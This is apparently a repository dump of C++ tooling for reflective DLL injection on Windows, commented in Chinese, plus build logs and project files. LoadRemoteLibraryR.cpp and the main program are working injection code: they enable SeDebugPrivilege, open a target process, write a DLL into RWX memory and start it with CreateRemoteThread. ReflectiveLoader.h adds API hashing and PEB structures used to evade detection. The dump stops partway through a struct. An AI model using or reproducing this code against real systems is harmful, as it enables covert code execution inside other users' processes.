--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/vc140.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/vc140.idb
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/vc140.pdb
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Release/ReflectiveDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/.vs/ReflectiveDLLInjection/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLLInjection/.vs/ReflectiveDLLInjection/v14/.suo
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/Debug/ReflectiveDLLInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/LoadRemoteLibraryR.cpp:
--------------------------------------------------------------------------------
1 | #include "LoadRemoteLibraryR.h"
2 | #include
3 | using namespace std;
4 | DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
5 | {
6 | //得到nt头在内存中的实际地址
7 | PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
8 | //获得节表
9 | PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
10 | //不在任意块内
11 | if (dwRva < pSectionHeader[0].PointerToRawData)
12 | return dwRva;
13 | //通过遍历块,来找到相对偏移地址对应的文件偏移地址
14 | for (WORD wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
15 | {
16 |
17 | if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
18 | return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
19 | // \------------------块内偏移-------------------/ \-----------块在文件中的偏移------------/
20 | }
21 | }
22 | DWORD GetReflectiveLoaderOffset(VOID * lpReflectiveDllBuffer)
23 | {
24 | //基址->在Dropper进程中开辟的堆空间的起始地址
25 | UINT_PTR uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
26 | //得到NT头的文件地址
27 | UINT_PTR uiExportDir = (UINT_PTR)uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
28 | //获得导出表结构体指针的地址
29 | UINT_PTR uiNameArray = (UINT_PTR)&(((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
30 | //该调用中,第一个参数即为导出表结构体映射到内存的相对虚拟地址
31 | //结果为找到到导出表结构体的内存地址
32 | uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
33 | //得到导出表名称数组在内存中的地址RVA
34 | uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
35 | //得到导出函数地址表在内存中的地址RVA
36 | UINT_PTR uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
37 | //得到函数序号地址表在内存中的地址
38 | UINT_PTR uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
39 | //导出函数的数量
40 | DWORD dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;
41 |
42 | while (dwCounter--)
43 | {
44 | //这里需要将获取到的各表的RVA转化为各表实际的文件偏移
45 | char *cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset((*(DWORD*)uiNameArray), uiBaseAddress));
46 | if (strstr(cpExportedFunctionName, "ReflectiveLoader") != NULL)
47 | {
48 | //获取地址表起始地址的实际位置
49 | uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
50 | //根据序号找到序号对应的函数地址
51 | uiAddressArray += (*(WORD*)(uiNameOrdinals) * sizeof(DWORD));
52 |
53 | // 返回ReflectiveLoader函数的文件偏移,即函数机器码的起始地址
54 | return Rva2Offset((*(DWORD*)uiAddressArray), uiBaseAddress);
55 | }
56 | uiNameArray += sizeof(DWORD);
57 | uiNameOrdinals += sizeof(WORD);
58 | }
59 |
60 | return 0;
61 | }
62 |
63 |
64 |
65 |
66 | HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter)
67 | {
68 | //HMODULE hResult = NULL;
69 | DWORD dwThreadId;
70 | HANDLE hThread = NULL;
71 | __try
72 | {
73 |
74 | do
75 | {
76 | if (!hProcess || !lpBuffer || !dwLength)
77 | break;
78 | //获取加载器的地址
79 | DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer);
80 | if (!dwReflectiveLoaderOffset)
81 | break;
82 | //在目标进程分配内存(RWX)
83 | LPVOID lpRemoteLibraryBuffer = VirtualAllocEx(hProcess, NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
84 | if (!lpRemoteLibraryBuffer)
85 | break;
86 | if (!WriteProcessMemory(hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL))
87 | break;
88 | //线程函数的地址=基地址+文件偏移
89 | LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset);
90 |
91 |
92 | hThread = CreateRemoteThread(hProcess, NULL, 1024 * 1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId);
93 |
94 | } while (0);
95 | }
96 | __except(EXCEPTION_EXECUTE_HANDLER)
97 | {
98 |
99 | hThread = NULL;
100 | }
101 | return hThread;
102 | }
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/LoadRemoteLibraryR.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter);
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ReflectiveDLLInjection Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ReflectiveDLLInjection application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ReflectiveDLLInjection application.
9 |
10 |
11 | ReflectiveDLLInjection.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ReflectiveDLLInjection.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ReflectiveDLLInjection.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ReflectiveDLLInjection.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.cpp:
--------------------------------------------------------------------------------
1 | // ReflectiveDLLInjection.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include "LoadRemoteLibraryR.h"
10 | using namespace std;
11 |
12 | #define BreakForError(reason){cout << reason << endl; break;}
13 |
14 | DWORD GetProcessIdByName(LPCTSTR processName)
15 | {
16 | DWORD dwPID;
17 | HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
18 | if (hSnapShot == INVALID_HANDLE_VALUE)
19 | {
20 | cout << "Take SnapShot Failed!" << endl;
21 | return 0;
22 | }
23 | else
24 | {
25 | cout << "Take SnapShot Success!" << endl;
26 | }
27 | PROCESSENTRY32 pe;
28 | pe.dwSize = sizeof(PROCESSENTRY32);
29 |
30 | if (!Process32First(hSnapShot, &pe))
31 | {
32 | cout << "Failed To Get The Information of System!" << endl;
33 | return 0;
34 | }
35 | else
36 | {
37 | cout << "Get the Information of System Success!" << endl;
38 | }
39 |
40 | while (Process32Next(hSnapShot, &pe))
41 | {
42 |
43 | if (!strcmp((const char *)processName, (const char *)pe.szExeFile))
44 | return pe.th32ProcessID;
45 |
46 | }
47 | return 0;
48 | }
49 |
50 |
51 | BOOL PrivilegeEscalation()
52 | {
53 |
54 | HANDLE hToken;
55 | LUID luid;
56 | TOKEN_PRIVILEGES tp;
57 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
58 | return FALSE;
59 | if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
60 | return FALSE;
61 | tp.PrivilegeCount = 1;
62 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
63 | tp.Privileges[0].Luid = luid;
64 |
65 | if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
66 | return FALSE;
67 | CloseHandle(hToken);
68 | return TRUE;
69 | }
70 |
71 | int main()
72 | {
73 | do
74 | {
75 |
76 | LPCTSTR processName = L"Task Manager.exe";
77 | DWORD dwPid = GetProcessIdByName(processName);
78 | if (dwPid == 0)
79 | BreakForError("Failed to Get the notepad's PID.");
80 | cout << "The PID of Notepad.exe is :" << dwPid << endl;
81 |
82 | LPCSTR injectionDll = "C:\\Users\\sudo\\Desktop\\ReflectiveDLLPEForm\\x64\\Debug\\ReflectiveDLL.dll";//"D:\\users\\sudo\\Documents\\GitHub\\ProcessInjection\\x64\\Debug\\ReflectiveDLL.dll";
83 | //Get the Handle of the DLL file.
84 | HANDLE hFile = CreateFileA(injectionDll, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
85 | if (hFile == INVALID_HANDLE_VALUE)
86 | BreakForError("Failed to open the DLL file.");
87 |
88 | //Get the DLL file size.
89 | DWORD dwLength = GetFileSize(hFile, NULL);
90 | if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
91 | BreakForError("Failed to get the DLL file size.");
92 |
93 | //在当前进程分配缓冲区
94 | LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);
95 | if (!lpBuffer)
96 | BreakForError("Failed to alloc a buffer.");
97 | //Read the DLL file.
98 | DWORD dwBytesRead = 0;
99 | if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == false)
100 | BreakForError("Failed to read the DLL file");
101 | if (!PrivilegeEscalation())
102 | BreakForError("Failed to Escalate Privilege.");
103 |
104 | //Open target process
105 | HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE,1496);
106 | cout << GetLastError() << endl;
107 | if (!hTargetProcess)
108 | BreakForError("Failed to Open the Target Process.");
109 |
110 | //Inject into target process
111 | HANDLE hMoudle = LoadRemoteLibraryR(hTargetProcess, lpBuffer, dwLength, NULL);
112 |
113 | } while (0);
114 | system("pause");
115 | return 0;
116 | }
117 |
118 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}
23 | Win32Proj
24 | ReflectiveDLLInjection
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | NotUsing
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | NotUsing
100 | Level3
101 | Disabled
102 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
103 | true
104 |
105 |
106 | Console
107 | true
108 |
109 |
110 |
111 |
112 | Level3
113 | Use
114 | MaxSpeed
115 | true
116 | true
117 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 | true
124 | true
125 |
126 |
127 |
128 |
129 | Level3
130 | Use
131 | MaxSpeed
132 | true
133 | true
134 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
135 | true
136 |
137 |
138 | Console
139 | true
140 | true
141 | true
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 | Create
158 | Create
159 | Create
160 | Create
161 |
162 |
163 |
164 |
165 |
166 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 | Source Files
43 |
44 |
45 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ReflectiveDLLInjection.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/x64/Debug/ReflectiveDLLInjection.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflectivedllinjection.pch
2 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\vc140.pdb
3 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\vc140.idb
4 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\stdafx.obj
5 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\loadremotelibraryr.obj
6 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflectivedllinjection.obj
7 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedllinjection.ilk
8 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedllinjection.exe
9 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedllinjection.pdb
10 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\cl.command.1.tlog
11 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\cl.read.1.tlog
12 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\cl.write.1.tlog
13 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\link.command.1.tlog
14 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\link.read.1.tlog
15 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\link.write.1.tlog
16 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/x64/Debug/ReflectiveDLLInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/x64/Release/ReflectiveDLLInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveDLLPEForm.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}
23 | Win32Proj
24 | ReflectiveDLLPEForm
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveDLLPEForm.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveDemo.cpp:
--------------------------------------------------------------------------------
1 | // ReflectiveDemo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include
5 | #include "ReflectiveLoader.h"
6 | using namespace std;
7 |
8 | int main()
9 | {
10 | do
11 | {
12 | //已经编译出的dll,在实现LoadLibraryA函数阶段,可以是任意DLL
13 | char *dllFile = "F:\\ReflectiveDLLInjection\\x64\\Debug\\reflective_dll.dll";
14 | HANDLE hFile = CreateFileA(dllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
15 | if (hFile == INVALID_HANDLE_VALUE)
16 | {
17 | cout << "File Path is Wrong!" << endl;
18 | break;
19 | }
20 | else
21 | {
22 | cout << "Get File Success." << endl;
23 | }
24 | DWORD dwLength = GetFileSize(hFile, NULL);
25 | if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
26 | {
27 | cout << "Failed to get the Dll file size." << endl;
28 | break;
29 | }
30 | else
31 | {
32 | cout << "File size is :" << dwLength << endl;
33 | }
34 | LPVOID hBaseAddress = VirtualAlloc(NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
35 | if (!hBaseAddress)
36 | {
37 | cout << "Failed to Alloc Memory." << endl;
38 | break;
39 | }
40 | else
41 | {
42 | cout << "BaseAddress is :" << hBaseAddress << endl;
43 | }
44 | DWORD dwBytesRead;
45 | if (ReadFile(hFile, hBaseAddress, dwLength, &dwBytesRead, NULL) == false)
46 | cout << "Failed to Read File!" << endl;
47 | ReflectiveLoader((ULONG_PTR)hBaseAddress);
48 |
49 | } while (0);
50 | system("parse");
51 | return 0;
52 | }
53 |
54 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveLoader.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
5 | typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
6 | typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
7 | typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
8 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
9 | #define KERNEL32DLL_HASH 0x6A4ABC5B
10 | #define NTDLLDLL_HASH 0x3CFA685D
11 |
12 | #define LOADLIBRARYA_HASH 0xEC0E4E8E
13 | #define GETPROCADDRESS_HASH 0x7C0DFCAA
14 | #define VIRTUALALLOC_HASH 0x91AFCA54
15 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
16 |
17 |
18 | //ReflectiveDLLInjection.h
19 | #define DEREF( name )*(UINT_PTR *)(name)
20 | #define DEREF_64( name )*(DWORD64 *)(name)
21 | #define DEREF_32( name )*(DWORD *)(name)
22 | #define DEREF_16( name )*(WORD *)(name)
23 | #define DEREF_8( name )*(BYTE *)(name)
24 |
25 | #define HASH_KEY 13
26 | #pragma intrinsic( _rotr )
27 | __forceinline DWORD ror(DWORD d)
28 | {
29 | return _rotr(d, HASH_KEY);
30 | }
31 |
32 | __forceinline DWORD hash(char * c)
33 | {
34 | register DWORD h = 0;
35 | do
36 | {
37 | h = ror(h);
38 | h += *c;
39 | } while (*++c);
40 |
41 | return h;
42 | }
43 |
44 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
45 | {
46 | struct _PEB_FREE_BLOCK * pNext;
47 | DWORD dwSize;
48 | } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
49 |
50 |
51 | typedef struct _UNICODE_STR
52 | {
53 | USHORT Length;
54 | USHORT MaximumLength;
55 | PWSTR pBuffer;
56 | } UNICODE_STR, *PUNICODE_STR;
57 |
58 |
59 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
60 | {
61 | DWORD dwLength;
62 | DWORD dwInitialized;
63 | LPVOID lpSsHandle;
64 | LIST_ENTRY InLoadOrderModuleList;
65 | LIST_ENTRY InMemoryOrderModuleList;
66 | LIST_ENTRY InInitializationOrderModuleList;
67 | LPVOID lpEntryInProgress;
68 | } PEB_LDR_DATA, *PPEB_LDR_DATA;
69 |
70 |
71 | typedef struct _RTL_USER_PROCESS_PARAMETERS {
72 | BYTE Reserved1[16];
73 | PVOID Reserved2[10];
74 | UNICODE_STR ImagePathName;
75 | UNICODE_STR CommandLine;
76 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
77 | typedef struct __PEB // 65 elements, 0x210 bytes
78 | {
79 | //BYTE bInheritedAddressSpace;
80 | //BYTE bReadImageFileExecOptions;
81 | //BYTE bBeingDebugged;
82 | //BYTE bSpareBool;
83 | //LPVOID lpMutant;
84 | //LPVOID lpImageBaseAddress;
85 | //PPEB_LDR_DATA pLdr;
86 | //LPVOID lpProcessParameters;
87 | //LPVOID lpSubSystemData;
88 | //LPVOID lpProcessHeap;
89 | //PRTL_CRITICAL_SECTION pFastPebLock;
90 | //LPVOID lpFastPebLockRoutine;
91 | //LPVOID lpFastPebUnlockRoutine;
92 | //DWORD dwEnvironmentUpdateCount;
93 | //LPVOID lpKernelCallbackTable;
94 | //DWORD dwSystemReserved;
95 | //DWORD dwAtlThunkSListPtr32;
96 | //PPEB_FREE_BLOCK pFreeList;
97 | //DWORD dwTlsExpansionCounter;
98 | //LPVOID lpTlsBitmap;
99 | //DWORD dwTlsBitmapBits[2];
100 | //LPVOID lpReadOnlySharedMemoryBase;
101 | //LPVOID lpReadOnlySharedMemoryHeap;
102 | //LPVOID lpReadOnlyStaticServerData;
103 | //LPVOID lpAnsiCodePageData;
104 | //LPVOID lpOemCodePageData;
105 | //LPVOID lpUnicodeCaseTableData;
106 | //DWORD dwNumberOfProcessors;
107 | //DWORD dwNtGlobalFlag;
108 | //LARGE_INTEGER liCriticalSectionTimeout;
109 | //DWORD dwHeapSegmentReserve;
110 | //DWORD dwHeapSegmentCommit;
111 | //DWORD dwHeapDeCommitTotalFreeThreshold;
112 | //DWORD dwHeapDeCommitFreeBlockThreshold;
113 | //DWORD dwNumberOfHeaps;
114 | //DWORD dwMaximumNumberOfHeaps;
115 | //LPVOID lpProcessHeaps;
116 | //LPVOID lpGdiSharedHandleTable;
117 | //LPVOID lpProcessStarterHelper;
118 | //DWORD dwGdiDCAttributeList;
119 | //LPVOID lpLoaderLock;
120 | //DWORD dwOSMajorVersion;
121 | //DWORD dwOSMinorVersion;
122 | //WORD wOSBuildNumber;
123 | //WORD wOSCSDVersion;
124 | //DWORD dwOSPlatformId;
125 | //DWORD dwImageSubsystem;
126 | //DWORD dwImageSubsystemMajorVersion;
127 | //DWORD dwImageSubsystemMinorVersion;
128 | //DWORD dwImageProcessAffinityMask;
129 | //DWORD dwGdiHandleBuffer[34];
130 | //LPVOID lpPostProcessInitRoutine;
131 | //LPVOID lpTlsExpansionBitmap;
132 | //DWORD dwTlsExpansionBitmapBits[32];
